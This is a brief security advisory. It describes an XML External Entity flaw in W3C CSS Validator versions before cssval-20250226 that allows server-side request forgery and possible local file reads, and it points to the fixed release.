W3C CSS Validator XXE Vulnerability Leading to SSRF and Potential LFI
Vulnerability
A vulnerability allowing XML External Entity (XXE) processing has been identified in W3C CSS Validator versions prior to cssval-20250226. This XXE vulnerability can be exploited to perform server-side request forgery (SSRF) attacks by coercing the server to make requests to internal or external resources. Additionally, on some systems, this vulnerability could be used to read arbitrary local files if the attacker has access to exception messages.
Impact
Exploitation of this vulnerability could lead to server-side request forgery (SSRF) attacks, with the potential to read arbitrary local files under certain conditions.
Reproduction
The vulnerability can be reproduced by sending a crafted XML payload that exploits the XXE vulnerability, such as one that includes a reference to an external entity. This can be done using the W3C CSS Validator application or library.
Remediation
Users can update to W3C CSS Validator version cssval-20250226 or later to address this vulnerability.
Vulnerability Rating
Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.